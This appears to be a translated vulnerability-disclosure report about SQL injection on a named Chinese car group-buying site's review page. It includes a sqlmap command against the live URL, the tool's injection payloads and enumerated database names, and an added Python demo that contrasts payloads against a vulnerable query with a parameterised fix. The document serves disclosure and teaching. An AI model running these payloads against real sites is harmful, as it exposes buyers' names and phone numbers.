2015-05-05: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed to the public.
2015-06-19: The vendor has actively ignored the vulnerability; details disclosed to the public.
SQL injection on a Kuaiche group-buying site (快车团购) exposes a large amount of user information

An SQL injection triggered by the "Past Events" (往期回顾) page:
http://www.5757car.com/review.php?id=70
The database holds a large volume of users' car-purchase records, including phone numbers, car models, buyers' names and so on.
python sqlmap.py -u "www.5757car.com/review.php?id=70"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=70 AND 9860=9860

    Type: UNION query
    Title: MySQL UNION query (NULL) - 32 columns
    Payload: id=-5908 UNION ALL SELECT NULL,CONCAT(0x3a6869753a,0x66626a59556b66564a7a,0x3a626a783a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=70 AND SLEEP(5)
---
[12:07:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[12:07:50] [INFO] fetching database names
[12:07:50] [INFO] the SQL query used returns 7 entries
[12:07:50] [INFO] resumed: "information_schema"
[12:07:50] [INFO] resumed: "1717car"
[12:07:50] [INFO] resumed: "5757car"
[12:07:50] [INFO] resumed: "5757wx"
[12:07:50] [INFO] resumed: "mysql"
[12:07:50] [INFO] resumed: "performance_schema"
[12:07:50] [INFO] resumed: "system"
available databases [7]:
[*] 1717car
[*] 5757car
[*] 5757wx
[*] information_schema
[*] mysql
[*] performance_schema
[*] system
Screenshots as proof, like this:

And another, like this:
At the very least add some input filtering: cast id to an integer or bind it as a query parameter instead of concatenating it into the SQL string.
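The pattern behind the sqlmap result above and the fix the report asks for, as an added example that is not from the original report or from the site's own code. It uses an in-memory SQLite database with constructed tables (review, car_order) and sample rows, so MySQL's CONCAT() becomes `||` and the time-based SLEEP(5) payload is not reproduced; the function names and schema are assumptions.

```python
import sqlite3

# Constructed stand-in for the site's database: a "review" table behind
# review.php?id=..., and an order table holding the buyer data the report
# says was exposed. Table and column names are assumptions, not the site's.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE review (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE car_order (id INTEGER PRIMARY KEY, buyer_name TEXT,
                                phone TEXT, car_model TEXT);
        INSERT INTO review VALUES (70, 'Past event 70', 'group-buy recap');
        INSERT INTO car_order VALUES (1, 'Zhang San', '13800000001', 'Model A');
        INSERT INTO car_order VALUES (2, 'Li Si',     '13800000002', 'Model B');
    """)
    return conn

def vulnerable_review(conn, id_param):
    """Mimics the flaw: the id query-string value is pasted straight into SQL."""
    sql = "SELECT id, title, body FROM review WHERE id=" + id_param
    return conn.execute(sql).fetchall()

def hardened_review(conn, id_param):
    """Fixed version: require an integer, then bind it as a parameter."""
    try:
        review_id = int(id_param)
    except ValueError:
        return []  # not a number: refuse rather than build SQL from it
    return conn.execute(
        "SELECT id, title, body FROM review WHERE id=?", (review_id,)
    ).fetchall()

# Payloads modelled on the techniques sqlmap reported. SQLite has no
# CONCAT() or SLEEP(); '||' stands in for CONCAT, and sqlite_master plays
# the role of information_schema for the "fetching database names" step.
BOOLEAN_TRUE = "70 AND 9860=9860"
BOOLEAN_FALSE = "70 AND 9860=9861"
UNION_DUMP = ("-5908 UNION ALL SELECT NULL, buyer_name || ':' || phone, "
              "car_model FROM car_order")
UNION_SCHEMA = "-5908 UNION ALL SELECT NULL, name, type FROM sqlite_master"

def demo():
    """Run each payload against both versions and return the rows each produced."""
    conn = make_db()
    return {
        "legit":        vulnerable_review(conn, "70"),
        "bool_true":    vulnerable_review(conn, BOOLEAN_TRUE),   # same as legit
        "bool_false":   vulnerable_review(conn, BOOLEAN_FALSE),  # empty: blind oracle
        "union_dump":   vulnerable_review(conn, UNION_DUMP),     # buyer data leaks
        "union_schema": vulnerable_review(conn, UNION_SCHEMA),   # table names leak
        "fixed_legit":  hardened_review(conn, "70"),
        "fixed_bool":   hardened_review(conn, BOOLEAN_TRUE),     # rejected
        "fixed_union":  hardened_review(conn, UNION_DUMP),       # rejected
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:13s} -> {rows}")
```

The boolean pair is the oracle sqlmap's blind technique relies on: a true condition returns the normal page and a false one returns nothing, which is enough to extract data one bit at a time even without a UNION. The hardened function closes all three techniques at once because the value never reaches the SQL parser as text.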
Could not reach the vendor, or the vendor actively declined.
Vulnerability Rank: 8 (WooYun rating)